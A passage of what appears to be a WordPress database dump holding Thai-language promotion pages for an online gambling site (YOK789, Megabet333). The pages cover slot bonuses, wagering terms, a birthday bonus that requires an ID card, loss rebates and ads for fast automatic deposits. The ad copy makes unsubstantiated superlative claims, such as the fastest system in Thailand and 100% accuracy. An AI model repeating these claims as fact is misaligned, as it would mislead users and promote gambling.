data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"https://mgbline.com/\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ <b>YOK789</b></strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><strong data-start=\"2414\" data-end=\"2445\"><b>YOK789</b> ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-24 05:49:10','2026-02-24 05:49:10','',27,'https://yok789ss.com/?p=310',0,'revision','',0),(312,3,'2026-02-24 05:53:26','2026-02-24 05:53:26','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-start=\"355\" data-end=\"698\">ในยุคนี้ 2025 เรียนกได้ว่าเป็นยุคแห่งเทคโนโลยีเลยก็ได้ว่า ยุคที่ทุกอย่างต้องเร็วและสะดวก สล็อตเว็บตรง megabet เองก็ต้องปรับตัวให้ทันสมัยเช่นกัน และหนึ่งในระบบที่เปลี่ยนประสบการณ์การเล่นเกมของนักเดิมพันไทยไปอย่างสิ้นเชิงก็คือ ระบบฝากถอนออโต้จากเว็บ Megabet333 ที่ขึ้นชื่อว่าเร็วที่สุดในไทย ใช้เวลาเพียง 5 วินาทีเท่านั้น เงินก็เข้าบัญชีทันที ไม่ต้องรอแอดมิน ไม่ต้องส่งสลิปให้ยุ่งยากอีกต่อไป เว็บเมก้าเบทถือเป็นผู้นำด้านเทคโนโลยีระบบอัตโนมัติในวงการสล็อตออนไลน์ ด้วยการพัฒนาแพลตฟอร์มเชื่อมต่อกับ API จากผู้ให้บริการธนาคารโดยตรง ทำให้ทุกการฝากถอนเป็นแบบเรียลไทม์ ปลอดภัย และแม่นยำ 100% ไม่ว่าคุณจะฝากหลักสิบหรือถอนหลักแสน ระบบก็ประมวลผลได้ทันที ช่วยให้คุณเล่นเกมสล็อตได้ต่อเนื่องแบบไม่สะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ Megabet333 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ Megabet333 โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ Megabet333</strong></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><strong>ด้วยระบบนี้ Megabet333 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</strong></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-24 05:53:26','2026-02-24 05:53:26','',29,'https://yok789ss.com/?p=312',0,'revision','',0),(313,3,'2026-02-24 05:53:26','2026-02-24 05:53:26','<h1>Megabet333 ฝากถอนออโต้ ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-start=\"355\" data-end=\"698\">ในยุคนี้ 2025 เรียนกได้ว่าเป็นยุคแห่งเทคโนโลยีเลยก็ได้ว่า ยุคที่ทุกอย่างต้องเร็วและสะดวก สล็อตเว็บตรง megabet เองก็ต้องปรับตัวให้ทันสมัยเช่นกัน และหนึ่งในระบบที่เปลี่ยนประสบการณ์การเล่นเกมของนักเดิมพันไทยไปอย่างสิ้นเชิงก็คือ ระบบฝากถอนออโต้จากเว็บ Megabet333 ที่ขึ้นชื่อว่าเร็วที่สุดในไทย ใช้เวลาเพียง 5 วินาทีเท่านั้น เงินก็เข้าบัญชีทันที ไม่ต้องรอแอดมิน ไม่ต้องส่งสลิปให้ยุ่งยากอีกต่อไป เว็บเมก้าเบทถือเป็นผู้นำด้านเทคโนโลยีระบบอัตโนมัติในวงการสล็อตออนไลน์ ด้วยการพัฒนาแพลตฟอร์มเชื่อมต่อกับ API จากผู้ให้บริการธนาคารโดยตรง ทำให้ทุกการฝากถอนเป็นแบบเรียลไทม์ ปลอดภัย และแม่นยำ 100% ไม่ว่าคุณจะฝากหลักสิบหรือถอนหลักแสน ระบบก็ประมวลผลได้ทันที ช่วยให้คุณเล่นเกมสล็อตได้ต่อเนื่องแบบไม่สะดุด</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/3icon_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ Megabet333 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ Megabet333 โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ Megabet333</strong></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><strong>ด้วยระบบนี้ Megabet333 จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</strong></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-24 05:53:26','2026-02-24 05:53:26','',29,'https://yok789ss.com/?p=313',0,'revision','',0),(314,3,'2026-02-24 05:53:26','2026-02-24 05:53:26','<h1>YOK789 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า</h1> <p data-pm-slice=\"0 0 []\">เว็บพนัน <b>YOK789</b> มาพร้อมระบบฝากถอนออโต้ที่ทันสมัย ออกแบบมาเพื่อความรวดเร็วและสะดวกสบายของผู้ใช้งาน ระบบทำงานอัตโนมัติเต็มรูปแบบ ตลอด 24 ชั่วโมงไม่ต้องรอแอดมินไม่ต้องเสียเวลา ทำรายการเสร็จภายในไม่กี่ขั้นตอน จุดเด่นคือไม่มีขั้นต่ำในการฝากถอนช่วยให้บริหารงบประมาณได้อย่างยืดหยุ่น เหมาะทั้งมือใหม่และผู้เล่นประจำ เพียงไม่กี่วินาที เงินก็สามารถเข้าบัญชีได้อย่างรวดเร็วระบบมีความเสถียร ปลอดภัยและรองรับหลายธนาคารชั้นนำในประเทศไทย ตอบโจทย์ผู้ที่ต้องการความไว ความคุ้มค่าและความสะดวกสบาย อย่างไรก็ตามควรใช้บริการอย่างมีสติ และสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้นเพื่อการใช้งานอย่างรับผิดชอบ</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789.webp\" alt=\"3icon\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/3icon-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ทำไมระบบฝากถอนออโต้ของเว็บคาสิโนออนไลน์ YOK789 ถึงเร็วกว่าเว็บอื่น</h2> <p data-start=\"2289\" data-end=\"2531\">สิ่งที่ทำให้ <b>YOK789</b> โดดเด่นเหนือเว็บอื่น คือการใช้เทคโนโลยี <strong data-start=\"2353\" data-end=\"2380\">Auto Transaction System</strong> ที่เชื่อมต่อโดยตรงกับธนาคารและผู้ให้บริการวอเลทในประเทศไทย ซึ่งระบบนี้ถูกนำเข้าจาก USA และได้รับการปรับแต่งให้เหมาะกับการใช้งานของผู้เล่นไทยโดยเฉพาะ</p><p data-start=\"2533\" data-end=\"2575\"><strong>จุดเด่นของระบบฝากถอนออโต้ <b>YOK789</b> </strong></p><ul><li data-start=\"2578\" data-end=\"2668\"><strong data-start=\"2578\" data-end=\"2617\">เชื่อมต่อโดยตรงกับธนาคารหลักทุกแห่ง</strong> เช่น กสิกรไทย, กรุงเทพ, ไทยพาณิชย์, กรุงศรีฯ ฯลฯ</li><li data-start=\"2671\" data-end=\"2753\"><strong data-start=\"2671\" data-end=\"2707\">รองรับ TrueMoney Wallet เต็มระบบ</strong> เหมาะสำหรับผู้เล่นที่ไม่สะดวกใช้บัญชีธนาคาร</li><li data-start=\"2756\" data-end=\"2796\"><strong data-start=\"2756\" data-end=\"2794\">ตรวจจับยอดฝากทันทีด้วย AI อัจฉริยะ</strong></li><li data-start=\"2799\" data-end=\"2866\"><strong data-start=\"2799\" data-end=\"2840\">ระบบความปลอดภัยสูงสุดแบบ 2 ชั้น (2FA)</strong> ป้องกันการโจรกรรมข้อมูล</li><li data-start=\"2869\" data-end=\"2919\"><strong data-start=\"2869\" data-end=\"2903\">ใช้เวลาเพียง 5 วินาทีต่อรายการ</strong> ทั้งฝากและถอน</li></ul><blockquote><p style=\"text-align: center;\" data-start=\"2921\" data-end=\"3018\"><em><strong>ด้วยระบบนี้ <b>YOK789</b> จึงกลายเป็นเว็บพนันที่ทั้ง “เร็ว” และ “เสถียร” ที่สุดในประเทศไทยในขณะนี้</strong></em></p></blockquote>','ฝากถอนออโต้','','inherit','closed','closed','','29-revision-v1','','','2026-02-24 05:53:26','2026-02-24 05:53:26','',29,'https://yok789ss.com/?p=314',0,'revision','',0),(315,3,'2026-02-24 05:58:56','2026-02-24 05:58:56','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2026-02-24 05:58:56','2026-02-24 05:58:56','',7,'https://yok789ss.com/?p=315',0,'revision','',0),(316,3,'2026-02-24 05:59:44','2026-02-24 05:59:44','','Default Kit','','inherit','closed','closed','','7-revision-v1','','','2026-02-24 05:59:44','2026-02-24 05:59:44','',7,'https://yok789ss.com/?p=316',0,'revision','',0),(317,3,'2026-02-24 06:02:20','2026-02-24 06:02:20','https://amb18b.com/wp-content/uploads/2026/02/cropped-Yok789-loggo.webp','cropped-cropped-Yok789-loggo.webp','','inherit','','closed','','cropped-cropped-yok789-loggo-webp','','','2026-02-24 06:02:20','2026-02-24 06:02:20','',295,'https://yok789ss.com/wp-content/uploads/2026/02/cropped-cropped-Yok789-loggo.webp',0,'attachment','image/webp',0),(323,3,'2026-02-24 07:41:57','2026-02-24 07:41:57','<a href=\"https://luca333auto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://luca333auto.com/\" 